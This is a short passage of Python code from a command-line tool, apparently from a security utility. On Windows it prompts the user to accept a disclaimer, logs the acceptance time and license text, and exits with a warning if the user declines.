exit(0)
elif os_check() == "windows":
lic = input(
now.no_color_timed(de=0) +
"[*] I accept the disclaimer (yes/no): ")
if lic == "yes" or lic == "y":
create_date = int(round(time.time() * 1000))
output_text(licenses, create_date)
else:
print(
now.timed(de=0) + color.red_warn() +
color.red(" Good Lucking"))
exit(0)
